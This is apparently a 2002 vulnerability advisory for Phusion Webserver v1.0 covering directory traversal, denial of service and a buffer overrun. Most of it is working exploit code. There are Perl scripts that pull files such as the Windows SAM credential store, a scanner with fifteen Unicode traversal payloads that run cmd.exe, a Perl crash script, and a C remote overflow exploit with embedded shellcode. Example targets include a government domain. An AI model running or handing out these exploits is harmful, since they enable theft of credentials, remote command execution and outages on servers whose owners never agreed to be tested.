------oOo---------------- Phusion Webserver Directory Traversal, DoS Vulnerabilities and BufferOverrun, (Released exploits Codes). ------oOo---------------- Phusion Webserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow users to see and retrieve any file on the server. Exploit information included. Company Affected: www.BBShareware.com Version: v1.0 Dowload: http://www.bbshareware.com/phusion/ Size: 1.99 KB OS Affected: Windows ALL. Author: ** Alex Hernandez ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins ** G.Maggiotti & H.Oliveira. ----=[Brief Description]=------------ Phusion Webserver Server is an Webserver for Windows 9x/NT/2000. A bug allows any user to change to any directory and see files to PATH also GET files remotely also exist a BufferOverrun you can run abitrary code inside. ----=[Summary]=---------------------- >From the developer: "Phusion can be setup so that friends, family, clients, or co-workers can login to your computer, safely and securly from any internet connected computer in the world. No setup fees, no startup fees, no waiting, simply download and install Phusion, activate it, and your computer becomes a web site. You can pick the files and directories you want to share, and feel safe knowing that's all the users can access with Phusion's secure technology".<--jaja. Exist three vulnerabilities: a) Directory Traversal.(Exploits Released) b) Denial Of Service. (Exploits Released) c) BufferOverrun.(Exploits Released) ------oOo-------- Proof Of concept The security vulnerability is possible by using a specially crafted URL composed of triple dot ".../" directory traversal sequences, with HTTP encoded character representations substituted for "/" and "\". Example: http://www.example.com/.../.../.../.../test.txt sh-2.04# nc -vvn 10.0.0.1 80 (UNKNOWN) [10.0.0.1] 80 (?) open GET /.../.../.../.../test.txt HTTP /1.0 HAVE Fun! , i seen this file remote ;-) /Alex Hernandez! sent 41, rcvd 70 sh-2.04# DoS Example: Server crashes after sending a very long URL: Examples: http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA sh-2.04# nc -vvn 10.0.0.1 80 (UNKNOWN) [10.0.0.1] 80 (?) open GET /cgi-bin/.../.../.../.../ HTTP/1.0 sent 42, rcvd 0 sh-2.04# Crash system and the admin need restart the service!. Exploits: You can test your own IIS system with the following URL: http://10.0.0.1/scripts/..%c0%af (which translates to '/') Or http://10.0.0.1/scripts/..%c1%9c (which translates to '\') Or (For the execution bug) http://10.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Or http://10.0.0.1/.../.../.../.../winnt/system32/cmd.exe?/c+dir+c:\ NOTE: DEPENDING OF PATH THE INSTALLATION OF SOFTWARE. ------oOo------------------------ Exploit Code GET files Phusion-GET.pl ------oOo------------------------ #!/usr/bin/perl # # THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN # # Simple script to get files on server. # # Maybe u need this line for windows: # #! c:\perl\bin\perl.exe # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion-GET.pl # # print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); print <<"EOT"; Please type the address remote webserver, example: www.whitehouse.gov [Default remote Webserver is "127.0.0.1"`]: EOT $host = <>; print <<"EOT"; Please type only in the directory where the file is located you want to download, example: /winnt/repair/ [default directory is "/winnt/repair/"] :#For IIS 4-5 EOT $directory = <> || "/winnt/repair/"; print <<"EOT"; Please type in the filename you want download example: sam._ [default file is "sam._"] : EOT $file = <> || "sam._"; { #Maybe u to change this line depending of PATH installation. system("explorer.exe", "http://$host:80/../../..$directory$file"); } print <<"EOT"; HAVE Fun!. ;-) EOT ------oOo------------------------ Exploit Code Traversal Phusion_exp.pl ------oOo------------------------ #!/usr/bin/perl # # Simple script to identify if the host is vulnerable!, # # This does 15 different checks based IIS 4-5. Have Fun! # # Phusion Webserver v1.0 proof-of-concept exploit # By Alex Hernandez (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_exp.pl : # # Example: # # perl -x Phusion_exp.pl www.whitehouse.com:80 # Trying..................... # # :-) # Check the previous notes to execute bugs. # # use Socket; if ($#ARGV<0) {die " \nPhusion Webserver v1.0 traversal exploit(c)2002. Alex Hernandez al3xhernandez\@ureach.com\n Usage: perl -x $0 www.whitehouse.com:80 {OR}\n [if the host is not using a proxy]\n Usage: perl -x $0 127.0.0.1:80\n\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying.....................\n"; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 2 my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 3 my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 4 my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 5 my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 6 my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 7 my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 8 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 9 my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 10 my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 11 my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 12 my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 13 my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 14 my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 15 my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} #------------------------------ if ($flag==1){print " :-)\n Check the previous notes to execute bugs\n";} else {print " :-( \n Check manually on browser...\n";} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); } } ------oOo------------- Exploit Code DoS Phusion_DoS.pl ------oOo------------- #!/usr/bin/perl # # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # Phusion Webserver v1.0 proof-of-concept exploit. # By Alex Hernandez (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Phusion_DoS.pl -s # # Example: # # perl -x Phusion_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "3000"; $data .= $def x $num; $serv = $args{s}; $port = 80; $buf = "GET /cgi-bin/$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s \n\n");} ------oOo------------------------ Exploit Code BufferOverrun Phusion-ovrun.c ------oOo------------------------ /** Phusion-Overun.c ** -Remote exploit for Phusion Webserver v1.0 for WinNT. ** ** Phusion Webserver v1.0 exploit gets remote servers's full control. ** When you attacks a vulnerable server you can run abitrary code ** inside. ** ** Phusion Webserver v1.0 proof-of-concept exploit. ** By Alex Hernandez (C)2002. ** ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, ** G.Maggiotti & H.Oliveira. ** ** ** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c ** ** Usage: ./Phusion-ovrun ** ** ** ** **/ #include #include #include #include #include #include #define _PORT 80 #define _X 10000 char runcrash[] = "GET /" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10" "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50" "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18" "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b" "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9" "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99" "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9" "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99" "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02" "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e" "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65" "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca" "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5" "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee" "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9" "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9" "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed" "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5" "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc" "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc" "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed" "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9" "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9" "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9" "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9" "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb" "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7" "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0" "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7" "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9" "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7" "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3" "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7" "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8" "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7" "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3" "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7" "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc" "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc" "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6" "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc" "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3" "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01"; int sock; struct sockaddr_in sock_a; struct hostent *host; int main (int argc, char *argv[]) { printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n"); printf("Alex Hernandez al3xhernandez@ureach.com\n\n"); if(argc < 2) { fprintf(stderr, "Error : Usage: %s \n", argv[0]); exit(0); } if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("create socket"); exit(-1); } sock_a.sin_family=AF_INET; sock_a.sin_port=htons(_PORT); memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { perror("create connect"); exit(-1); } fflush(stdout); write(sock,runcrash,_X); write(sock,"\n\n", 2); printf("done.\n\n"); } ------oOo------------------------------------ Vendor Response: The vendor was notified support@bbshareware.com http://www.BBShareware.com Patch Temporary: No Data of vendor. Alex Hernandez (c) 2002. ------oOo------------------------------------